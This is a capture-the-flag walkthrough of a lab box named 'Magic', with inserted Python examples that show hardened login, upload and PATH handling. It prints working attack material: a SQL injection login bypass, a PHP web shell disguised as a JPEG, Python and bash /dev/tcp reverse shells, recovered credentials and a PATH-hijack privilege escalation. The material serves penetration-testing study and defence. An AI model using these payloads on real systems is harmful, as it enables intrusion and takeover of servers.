Proof of Concept
10.129.3.114
Nmap
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Initial Access
Accessing the web service on port 80 shows a login page.
The login page has a SQL injection vulnerability that allows the login check to be bypassed.
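The bypass works because the password value is spliced into the SQL statement as text. As an added example (not code from the box or this write-up), the following rebuilds that behaviour against a constructed in-memory sqlite3 table and contrasts it with a parameterised query; the schema and stored password are assumptions.

```python
# Added example; not code from the Magic box or the write-up. It rebuilds the
# login bypass against an in-memory sqlite3 table (constructed sample data)
# and contrasts string-built SQL with a parameterised query.
import sqlite3

PAYLOAD = "1234' or '1'='1"   # the password value sent in the write-up's POST


def make_db() -> sqlite3.Connection:
    # Constructed schema mirroring the page's login table; the password is
    # stored in clear only to keep the comparison visible. Real applications
    # store a salted hash and compare it server-side.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO login (username, password) VALUES ('admin', 'not-the-real-one')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Input is spliced into the statement: the quote in the payload closes the
    # literal, and "or '1'='1" makes the WHERE clause true for every row.
    query = (f"SELECT id FROM login WHERE username = '{username}' "
             f"AND password = '{password}'")
    return conn.execute(query).fetchone() is not None


def login_hardened(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Placeholders bind the input as a value; the payload is compared as a
    # whole string and is never parsed as SQL.
    query = "SELECT id FROM login WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


def demo() -> dict:
    conn = make_db()
    return {
        "vulnerable_accepts_payload": login_vulnerable(conn, "admin", PAYLOAD),
        "hardened_accepts_payload": login_hardened(conn, "admin", PAYLOAD),
        "hardened_accepts_real_password": login_hardened(conn, "admin", "not-the-real-one"),
    }


if __name__ == "__main__":
    print(demo())
```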
POST /login.php HTTP/1.1
Host: 10.129.3.114
Content-Length: 39
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://10.129.3.114
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.129.3.114/login.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=on3h7rbdlosr0tte8kk9pfh6j0
Connection: keep-alive
username=admin&password=1234'+or+'1'='1
After a successful login the browser is redirected to /upload.php, which accepts JPG, JPEG and PNG files.
Create webshell.php.jpg, a PHP web shell with the JPEG header signature prepended
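The steps that follow show a file named webshell.php.jpg with a JPEG signature being accepted. As an added example (not upload.php from the box, whose source the write-up does not show), the loose checker below is an assumed reconstruction of the behaviour that upload demonstrates, placed beside the control set a defender would use instead.

```python
# Added example; not the upload.php code from the Magic box (not shown on
# the page). The loose checker is an assumed reconstruction; the hardened
# one is the check a defender would apply.
import os
import secrets

JPEG_MAGIC = b"\xff\xd8\xff"
PNG_MAGIC = b"\x89PNG\r\n\x1a\n"
ALLOWED = {"jpg": JPEG_MAGIC, "jpeg": JPEG_MAGIC, "png": PNG_MAGIC}

# Constructed sample matching the page's webshell.php.jpg: JPEG header + PHP tag.
WEBSHELL = b"\xff\xd8\xff\xe0" + b"<?=`$_GET[0]`?>"


def is_image_loose(filename: str, data: bytes) -> bool:
    # Assumed weak logic: name ends in an image extension and the first bytes
    # look like an image. "webshell.php.jpg" passes both tests.
    ok_ext = filename.lower().endswith((".jpg", ".jpeg", ".png"))
    ok_magic = any(data.startswith(m) for m in ALLOWED.values())
    return ok_ext and ok_magic


def validate_upload(filename: str, data: bytes) -> str:
    """Hardened check: returns a server-chosen storage name or raises ValueError."""
    parts = os.path.basename(filename).lower().split(".")
    # Exactly one extension, so "name.php.jpg" is rejected before a server
    # that maps ".php" anywhere in a name to the PHP handler ever sees it.
    if len(parts) != 2 or not parts[0]:
        raise ValueError("filename must be name.ext with a single extension")
    ext = parts[1]
    if ext not in ALLOWED:
        raise ValueError(f"extension .{ext} is not allowed")
    # The signature must match the declared type, not just "any image".
    if not data.startswith(ALLOWED[ext]):
        raise ValueError("content does not match the declared image type")
    # Never keep the user's name: random name plus the vetted extension.
    return f"{secrets.token_hex(16)}.{ext}"


def accepts(filename: str, data: bytes) -> bool:
    """True if the hardened validator would store the file."""
    try:
        validate_upload(filename, data)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    print(is_image_loose("webshell.php.jpg", WEBSHELL), accepts("webshell.php.jpg", WEBSHELL))
```

Re-encoding accepted images through an image library and storing uploads outside the executable web root remove the residual risk of payloads embedded in an otherwise valid image.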
┌──(kali㉿kali)-[~/Magic]
└─$ echo -n -e '\xff\xd8\xff\xe0' > webshell.php.jpg
┌──(kali㉿kali)-[~/Magic]
└─$ echo -n '<?=`$_GET[0]`?>' >> webshell.php.jpg
┌──(kali㉿kali)-[~/Magic]
└─$ file webshell.php.jpg
webshell.php.jpg: JPEG image data
┌──(kali㉿kali)-[~/Magic]
└─$ cat webshell.php.jpg
���<?=`$_GET[0]`?>
Web shell uploaded successfully
POST /upload.php HTTP/1.1
Host: 10.129.3.114
Content-Length: 315
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://10.129.3.114
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6QmWDLfx3kwyQdD5
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.129.3.114/upload.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=on3h7rbdlosr0tte8kk9pfh6j0
Connection: keep-alive
------WebKitFormBoundary6QmWDLfx3kwyQdD5
Content-Disposition: form-data; name="image"; filename="webshell.php.jpg"
Content-Type: image/jpeg
ÿØÿà<?=`$_GET[0]`?>
------WebKitFormBoundary6QmWDLfx3kwyQdD5
Content-Disposition: form-data; name="submit"
Upload Image
------WebKitFormBoundary6QmWDLfx3kwyQdD5--
Confirm that the web shell executes
┌──(kali㉿kali)-[~/Magic]
└─$ curl http://10.129.3.114/images/uploads/webshell.php.jpg?0=id
���uid=33(www-data) gid=33(www-data) groups=33(www-data)
Run a reverse shell command through the web shell
export%20RHOST="10.10.14.221";export%20RPORT=4444;python%20-c%20%27import%20sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd)%20for%20fd%20in%20(0,1,2)];pty.spawn("sh")%27
Reverse shell connection established
┌──(kali㉿kali)-[~/Magic]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.221] from (UNKNOWN) [10.129.3.114] 58590
$
Lateral Movement (auth as theseus)
Database credentials found in /var/www/Magic/db.php5
- theseus:iamkingtheseus
www-data@ubuntu:/var/www/Magic$ cat db.php5
cat db.php5
<?php
class Database
{
    private static $dbName = 'Magic' ;
    private static $dbHost = 'localhost' ;
    private static $dbUsername = 'theseus';
    private static $dbUserPassword = 'iamkingtheseus';
    private static $cont = null;
    public function __construct() {
        die('Init function is not allowed');
    }
    public static function connect()
    {
        // One connection through whole application
        if ( null == self::$cont )
        {
            try
            {
                self::$cont = new PDO( "mysql:host=".self::$dbHost.";"."dbname=".self::$dbName, self::$dbUsername, self::$dbUserPassword);
            }
            catch(PDOException $e)
            {
                die($e->getMessage());
            }
        }
        return self::$cont;
    }
    public static function disconnect()
    {
        self::$cont = null;
    }
}
The mysql client is not installed on the target, so reaching the database requires pivoting.
www-data@ubuntu:/var/www/Magic$ mysql
mysql
Command 'mysql' not found, but can be installed with:
apt install mysql-client-core-5.7
apt install mariadb-client-core-10.1
Ask your administrator to install one of them.
Set up port forwarding with chisel
- Kali Linux
┌──(kali㉿kali)-[~/Magic]
└─$ ./chisel server -p 8888 --reverse
2026/02/22 05:14:55 server: Reverse tunnelling enabled
2026/02/22 05:14:55 server: Fingerprint W19YSezXc+qOT4N4KMAPkePcItm6CtrMuRWx0bKe2PQ=
2026/02/22 05:14:55 server: Listening on http://0.0.0.0:8888
2026/02/22 05:15:36 server: session#1: tun: proxy#R:3306=>3306: Listening
- Target Machine
www-data@ubuntu:/var/www/Magic/images/uploads$ ./chisel client 10.10.14.221:8888 R:3306:127.0.0.1:3306
2026/02/22 02:15:35 client: Connecting to ws://10.10.14.221:8888
2026/02/22 02:15:37 client: Connected (Latency 202.556689ms)
Using the database credentials obtained earlier, connect to MySQL from Kali Linux
┌──(kali㉿kali)-[~/Magic]
└─$ mysql -h 127.0.0.1 -P 3306 -utheseus -piamkingtheseus
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 22
Server version: 5.7.29-0ubuntu0.18.04.1 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]>
Enumerate databases
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| Magic |
+--------------------+
2 rows in set (0.205 sec)
Enumerate tables
MySQL [(none)]> use Magic
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [Magic]> show tables;
+-----------------+
| Tables_in_Magic |
+-----------------+
| login |
+-----------------+
1 row in set (0.201 sec)
Password found in the login table
- admin:Th3s3usW4sK1ng
MySQL [Magic]> select * from login;
+----+----------+----------------+
| id | username | password |
+----+----------+----------------+
| 1 | admin | Th3s3usW4sK1ng |
+----+----------+----------------+
1 row in set (0.204 sec)
Switched to the theseus user with the recovered password
www-data@ubuntu:/var/www/Magic/images/uploads$ su - theseus
su - theseus
Password: Th3s3usW4sK1ng
theseus@ubuntu:~$
Read user.txt
theseus@ubuntu:~$ cat user.txt
cat user.txt
58cd47744c5214b4762224379f18cf18
theseus@ubuntu:~$ ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b0:90:e7 brd ff:ff:ff:ff:ff:ff
inet 10.129.3.114/16 brd 10.129.255.255 scope global ens160
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb0:90e7/64 scope global dynamic mngtmpaddr
valid_lft 86398sec preferred_lft 14398sec
inet6 fe80::250:56ff:feb0:90e7/64 scope link
valid_lft forever preferred_lft forever
Privilege Escalation
Enumerating SetUID files shows that /bin/sysinfo is SetUID root and executable by the users group.
theseus@ubuntu:~/.config$ find / -perm -4000 -type f -exec ls -l {} \; 2>/dev/null
<SNIP>
-rwsr-x--- 1 root users 22040 Oct 21 2019 /bin/sysinfo
-rwsr-xr-x 1 root root 43088 Jan 8 2020 /bin/mount
-rwsr-xr-x 1 root root 44664 Mar 22 2019 /bin/su
-rwsr-xr-x 1 root root 64424 Jun 28 2019 /bin/ping
The theseus user is a member of the users group
theseus@ubuntu:~/.config$ cat /etc/group | grep users
cat /etc/group | grep users
users:x:100:theseus
Tracing /bin/sysinfo with ltrace shows that it launches processes through popen
theseus@ubuntu:~/.config$ ltrace sysinfo
ltrace sysinfo
_ZNSt8ios_base4InitC1Ev(0x55a14763b131, 0xffff, 0x7fff637689c8, 128) = 0
__cxa_atexit(0x7ff7d00e7a40, 0x55a14763b131, 0x55a14763b008, 6) = 0
setuid(0) = -1
setgid(0) = -1
_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc(0x55a14763b020, 0x55a1474398f8, -160, 0) = 0x55a14763b020
_ZNSolsEPFRSoS_E(0x55a14763b020, 0x7ff7d0157870, 0x55a14763b020, 0x55a14743992d====================Hardware Info====================
) = 0x55a14763b020
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEC1Ev(0x7fff63768890, 0x55a14743992e, 0, 2880) = 0x7fff637688a0
popen("lshw -short", "r") = 0x55a1486ed280
fgets(WARNING: you should run this program as super-user.
WARNING: output may be incomplete or inaccurate, you should run this program as super-user.
"H/W path Device Class "..., 128, 0x55a1486ed280) = 0x7fff637687e0
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEPKc(0x7fff63768890, 0x7fff637687e0, 0x7fff637687e0, 0x6974706972637365) = 0x7fff63768890
fgets("================================"..., 128, 0x55a1486ed280) = 0x7fff637687e0
--- SIGCHLD (Child exited) ---
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEPKc(0x7fff63768890, 0x7fff637687e0, 0x7fff637687e0, 0x3d3d3d3d3d3d3d3d) = 0x7fff63768890
fgets(" system "..., 128, 0x55a1486ed280) = 0x7fff637687e0
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEPKc(0x7fff63768890, 0x7fff637687e0, 0x7fff637687e0, 0x72657475706d6f43) = 0x7fff63768890
fgets("/0 bus "..., 128, 0x55a1486ed280) = 0x7fff637687e0
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEPKc(0x7fff63768890, 0x7fff637687e0, 0x7fff637687e0, 0x6f62726568746f4d) = 0x7fff63768890
fgets("/0/0 memory "..., 128, 0x55a1486ed280) = 0x7fff637687e0
_ZNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEpLEPKc(0x7fff63768890, 0x7fff637687e0, 0x7fff637687e0, 0x6d206d6574737953) = 0x7fff63768890
<SNIP>
While running, /bin/sysinfo launches four processes; lshw, fdisk and free are invoked by bare name without a path.
- popen("lshw -short", "r")
- popen("fdisk -l", "r")
- popen("cat /proc/cpuinfo", "r")
- popen("free -h", "r")
Create a shell script named "free" in /tmp that opens a reverse shell connection
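A bare command name passed to popen is resolved by /bin/sh against the caller's PATH, which is why a writable directory placed first in PATH can supply the binary. The following is an added example (not the sysinfo source, which is C++ and not shown here): it models that lookup on a constructed directory layout and shows the hardened lookup a setuid program should use, skipping directories that unprivileged users can write to.

```python
# Added example; not the source of the box's sysinfo binary (C++, not shown).
# Models how /bin/sh resolves the bare names ltrace revealed ("lshw", "fdisk",
# "free") and the hardened lookup a setuid program should use instead.
import os
import stat
import tempfile


def resolve(command: str, path_env: str):
    """First executable named `command` along path_env, as /bin/sh would find it."""
    for d in path_env.split(":"):
        cand = os.path.join(d, command)
        if os.path.isfile(cand) and os.access(cand, os.X_OK):
            return cand
    return None


def dir_is_untrusted(directory: str) -> bool:
    """Group- or world-writable lookup directories (like /tmp) can be seeded by anyone."""
    return bool(os.stat(directory).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def resolve_trusted(command: str, path_env: str):
    """Hardened lookup: skip untrusted directories instead of taking the first hit."""
    for d in path_env.split(":"):
        if not os.path.isdir(d) or dir_is_untrusted(d):
            continue
        cand = os.path.join(d, command)
        if os.path.isfile(cand) and os.access(cand, os.X_OK):
            return cand
    return None


def build_sandbox():
    """Constructed layout: a 1777 'tmp' and a 0755 'bin', each holding a 'free'."""
    root = tempfile.mkdtemp()
    out = {}
    for name, mode in {"tmp": 0o1777, "bin": 0o755}.items():
        d = os.path.join(root, name)
        os.mkdir(d)
        f = os.path.join(d, "free")
        with open(f, "w") as fh:
            fh.write("#!/bin/sh\necho free\n")
        os.chmod(f, 0o755)
        os.chmod(d, mode)
        out[name] = d
    return out["tmp"], out["bin"]


if __name__ == "__main__":
    tmp, binp = build_sandbox()
    hijacked = f"{tmp}:{binp}"   # PATH with the writable directory first, as in the write-up
    print(resolve("free", hijacked), resolve_trusted("free", hijacked))
```

A real setuid program should also pin its own PATH to root-owned system directories, or call each helper by absolute path, rather than inheriting the environment at all.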
theseus@ubuntu:/tmp$ cat free
cat free
#!/bin/bash
bash -c 'sh -i >& /dev/tcp/10.10.14.221/4444 0>&1'
theseus@ubuntu:/tmp$ chmod a+x free
chmod a+x free
Set PATH so that binaries in /tmp are found first when a command is run
theseus@ubuntu:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
Run sysinfo
theseus@ubuntu:/tmp$ sysinfo
sysinfo
====================Hardware Info====================
H/W path Device Class Description
====================================================
system VMware Virtual Platform
/0 bus 440BX Desktop Reference Platform
/0/0 memory 86KiB BIOS
/0/1 processor AMD EPYC 7763 64-Core Processor
/0/1/0 memory 16KiB L1 cache
/0/1/1 memory 16KiB L1 cache
/0/1/2 memory 512KiB L2 cache
/0/1/3 memory 512KiB L2 cache
/0/2 processor AMD EPYC 7763 64-Core Processor
<SNIP>
Reverse shell connection as root established
┌──(kali㉿kali)-[~/Magic]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.221] from (UNKNOWN) [10.129.3.114] 59908
# id
uid=0(root) gid=0(root) groups=0(root),100(users),1000(theseus)
Read root.txt
# cat root.txt
36da9bcd0001792fd38f60f7a63a0819
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b0:90:e7 brd ff:ff:ff:ff:ff:ff
inet 10.129.3.114/16 brd 10.129.255.255 scope global ens160
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb0:90e7/64 scope global dynamic mngtmpaddr
valid_lft 86395sec preferred_lft 14395sec
inet6 fe80::250:56ff:feb0:90e7/64 scope link
valid_lft forever preferred_lft forever